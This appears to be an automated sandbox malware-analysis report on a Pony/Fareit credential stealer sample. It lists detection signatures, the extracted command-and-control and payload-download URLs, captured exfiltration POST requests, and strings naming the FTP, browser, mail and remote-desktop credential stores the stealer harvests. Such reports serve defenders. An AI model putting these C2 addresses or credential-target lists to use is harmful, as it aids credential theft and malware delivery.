Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
pbfe2Xcxue.exe

Overview

General Information

Sample name:pbfe2Xcxue.exe
renamed because original name is a hash value
Original sample name:604b748dca0419d94b618beb4c5b4710.exe
Analysis ID:1583552
MD5:604b748dca0419d94b618beb4c5b4710
SHA1:afec5dc4982d4ea85722448d2e8155274902c141
SHA256:b613f1a4fe5e99b6c4d32e72bef59d1e270a337b5b5d4e775cfb58a18b38c66e
Tags:exePonyuser-abuse_ch
Infos:

Detection

Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Pony
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • pbfe2Xcxue.exe (PID: 7428 cmdline: "C:\Users\user\Desktop\pbfe2Xcxue.exe" MD5: 604B748DCA0419D94B618BEB4C5B4710)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EvilPony, PonyshePrivately modded version of the Pony stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony
{"C2 list": ["http://67.158.38.155/jiKEb8.exe", "http://oliviagurun.com/forum/viewtopic.php", "http://aasthakitchen.com/vMTXwWg.exe", "http://onlyidea.com/forum/viewtopic.php", "http://ftp.pexgol.com/bm6dog.exe", "http://originalpizzaplus.ca/forum/viewtopic.php", "http://onecable.ca/forum/viewtopic.php", "http://www.ue-electronics.de/XjwiYdic.exe"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_PonyYara detected PonyJoe Security
      00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpWindows_Trojan_Pony_d5516fe8unknownunknown
      • 0x1fb1:$a1: \Global Downloader
      • 0x173a:$a2: wiseftpsrvs.bin
      • 0x1e11:$a3: SiteServer %d\SFTP
      • 0x1e05:$a4: %s\Keychain
      • 0x206f:$a5: Connections.txt
      • 0x23b6:$a6: ftpshell.fsi
      • 0x2b11:$a7: inetcomm server passwords
      00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpponyIdentify PonyBrian Wallace @botnet_hunter
      • 0x913:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x2b58:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x148:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0x806:$s3: POST %s HTTP/1.0
      • 0x82f:$s4: Accept-Encoding: identity, *;q=0
      00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        Click to see the 9 entries
        SourceRuleDescriptionAuthorStrings
        0.3.pbfe2Xcxue.exe.a70000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.3.pbfe2Xcxue.exe.a70000.0.unpackJoeSecurity_PonyYara detected PonyJoe Security
            0.3.pbfe2Xcxue.exe.a70000.0.unpackponyIdentify PonyBrian Wallace @botnet_hunter
            • 0x11d13:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            • 0x12f58:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
            • 0x11548:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
            • 0x11c06:$s3: POST %s HTTP/1.0
            • 0x1840:$s4: Accept-Encoding: identity, *;q=0
            • 0x11c2f:$s4: Accept-Encoding: identity, *;q=0
            0.3.pbfe2Xcxue.exe.a70000.0.unpackFareitFareit Payloadkevoreilly
            • 0x138fd:$string1: 0D 0A 09 09 0D 0A 0D 0A 09 20 20 20 3A 6B 74 6B 20 20 20 0D 0A 0D 0A 0D 0A 20 20 20 20 20 64 65 6C 20 20 20 20 09 20 25 31 20 20 0D 0A 09 69 66 20 20 09 09 20 65 78 69 73 74 20 09 20 20 20 25 ...
            0.3.pbfe2Xcxue.exe.a70000.0.raw.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              Click to see the 9 entries
              No Sigma rule has matched
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-03T03:12:50.647005+010020144111Malware Command and Control Activity Detected192.168.2.4497363.33.130.19080TCP
              2025-01-03T03:12:56.151035+010020144111Malware Command and Control Activity Detected192.168.2.4497543.33.130.19080TCP
              2025-01-03T03:13:01.668659+010020144111Malware Command and Control Activity Detected192.168.2.4497883.33.130.19080TCP
              2025-01-03T03:13:10.087497+010020144111Malware Command and Control Activity Detected192.168.2.4498423.33.130.19080TCP
              2025-01-03T03:13:16.509557+010020144111Malware Command and Control Activity Detected192.168.2.4498853.33.130.19080TCP
              2025-01-03T03:13:22.010132+010020144111Malware Command and Control Activity Detected192.168.2.4499233.33.130.19080TCP
              2025-01-03T03:13:30.447507+010020144111Malware Command and Control Activity Detected192.168.2.4499733.33.130.19080TCP
              2025-01-03T03:13:35.917877+010020144111Malware Command and Control Activity Detected192.168.2.4500093.33.130.19080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: pbfe2Xcxue.exeAvira: detected
              Source: http://onlyidea.com/forum/viewtopic.phpAvira URL Cloud: Label: phishing
              Source: https://login.live.coAvira URL Cloud: Label: malware
              Source: 0.2.pbfe2Xcxue.exe.400000.0.unpackMalware Configuration Extractor: Pony {"C2 list": ["http://67.158.38.155/jiKEb8.exe", "http://oliviagurun.com/forum/viewtopic.php", "http://aasthakitchen.com/vMTXwWg.exe", "http://onlyidea.com/forum/viewtopic.php", "http://ftp.pexgol.com/bm6dog.exe", "http://originalpizzaplus.ca/forum/viewtopic.php", "http://onecable.ca/forum/viewtopic.php", "http://www.ue-electronics.de/XjwiYdic.exe"]}
              Source: pbfe2Xcxue.exeReversingLabs: Detection: 95%
              Source: pbfe2Xcxue.exeVirustotal: Detection: 75%Perma Link
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.pbfe2Xcxue.exe.a70000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.pbfe2Xcxue.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: pbfe2Xcxue.exe PID: 7428, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: pbfe2Xcxue.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040A9D6 lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,0_2_0040A9D6
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040D67C CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,0_2_0040D67C
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040A81B WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,0_2_0040A81B
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040AC2F CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,0_2_0040AC2F
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040D0FB lstrlenA,CryptUnprotectData,LocalFree,0_2_0040D0FB
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040ADE6 lstrlenA,CryptUnprotectData,LocalFree,0_2_0040ADE6
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040465C CryptUnprotectData,LocalFree,0_2_0040465C
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_0040BEF4 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,0_2_0040BEF4

              Compliance

              barindex
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeUnpacked PE file: 0.2.pbfe2Xcxue.exe.400000.0.unpack
              Source: pbfe2Xcxue.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: pbfe2Xcxue.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00405478 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,0_2_00405478
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00404426 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00404426
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00405108 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00405108
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00408DAD FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00408DAD
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00408C29 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,0_2_00408C29
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00409AF6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,0_2_00409AF6
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49754 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49842 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49736 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49788 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49885 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49973 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49923 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:50009 -> 3.33.130.190:80
              Source: Malware configuration extractorURLs: http://67.158.38.155/jiKEb8.exe
              Source: Malware configuration extractorURLs: http://oliviagurun.com/forum/viewtopic.php
              Source: Malware configuration extractorURLs: http://aasthakitchen.com/vMTXwWg.exe
              Source: Malware configuration extractorURLs: http://onlyidea.com/forum/viewtopic.php
              Source: Malware configuration extractorURLs: http://ftp.pexgol.com/bm6dog.exe
              Source: Malware configuration extractorURLs: http://originalpizzaplus.ca/forum/viewtopic.php
              Source: Malware configuration extractorURLs: http://onecable.ca/forum/viewtopic.php
              Source: Malware configuration extractorURLs: http://www.ue-electronics.de/XjwiYdic.exe
              Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
              Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\pbfe2Xcxue.exeCode function: 0_2_00403133 recv,0_2_00403133
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/abe2869f-9b47-4cd9-a358-c22904dba7f7Microsoft_WinInet_*ftp://Software\Adobe\CommonSiteServersSiteServer %d\HostSiteServer %d\WebUrlSiteServer %d\Remote DirectorySiteServer %d-UserSiteServer %d-User PW%s\KeychainSiteServer %d\SFTPDeluxeFTPsites.xmlWeb DataLogin DataSQLite format 3table() CONSTRAINTPRIMARYUNIQUECHECKFOREIGNloginsorigin_urlpassword_valueusername_valueftp://http://https://\Google\Chrome\Chromium\ChromePlusSoftware\ChromePlusInstall_Dir\Bromium\Nichrome\Comodo\RockMeltK-Meleon\K-Meleon\ProfilesEpic\Epic\EpicStaff-FTPsites.ini\Sites\Visicom Media.ftpSettings\Global DownloaderSM.archFreshFTP.SMFBlazeFtpsite.datLastPasswordLastAddressLastUserLastPortSoftware\FlashPeak\BlazeFtp\Settings\BlazeFtp.fplFTP++.Link\shell\open\commandGoFTPConnections.txt3D-FTPsites.ini\3D-FTP\SiteDesignerSOFTWARE\Classes\TypeLib\{F9043C88-F6F2-101A-A3C9-08002B2F49FB}\1.2\0\win32EasyFTP\NetSarang.xfp.rdpTERMSRV/*password 51:b:username:s:full address:s:.TERMSRV/FTP NowFTPNowsites.xmlSOFTWARE\Robo-FTP 3.7\ScriptsSOFTWARE\Robo-FTP 3.7\FTPServersFTP CountFTP File%dPasswordServerNameUserIDInitialDirectoryPortNumberServerType equals www.facebook.com (Facebook)
              Source: pbfe2Xcxue.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: global trafficDNS traffic detected: DNS query: oliviagurun.com
              Source: global trafficDNS traffic detected: DNS query: onecable.ca
              Source: unknownHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: onecable.caAccept: */*Accept-Encoding: identity, *;q=0Accept-Language: en-USContent-Length: 183Content-Type: application/octet-streamConnection: closeContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://67.158.38.155/jiKEb8.exe
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://aasthakitchen.com/vMTXwWg.exe
              Source: pbfe2Xcxue.exe, pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ftp.pexgol.com/bm6dog.exe
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
              Source: pbfe2Xcxue.exe, pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://oliviagurun.com/forum/viewtopic.php
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://oliviagurun.com/forum/viewtopic.phphttp://onecable.ca/forum/viewtopic.phphttp://onlyidea.com/
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://onecable.ca/forum/viewtopic.php
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onecable.ca/forum/viewtopic.php$Z
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://onecable.ca/forum/viewtopic.phpH
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://onlyidea.com/forum/viewtopic.php
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://originalpizzaplus.ca/forum/viewtopic.php
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904253640.0000000000413000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: pbfe2Xcxue.exe, 00000000.00000003.1710300232.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000002.2904265429.0000000000414000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.ue-electronics.de/XjwiYdic.exe
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: pbfe2Xcxue.exe, 00000000.00000003.1719803091.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719722431.000000000059F000.00000004.00000020.00020000.00000000.sdmp, pbfe2Xcxue.exe, 00000000.00000003.1719510399.000000000059F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: pbfe2Xcxue.exe, 00000000.00000003.2023274882.0000000000562000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.co
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: pbfe2Xcxue.exe, 00000000.00000002.2904373998.000000000052C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
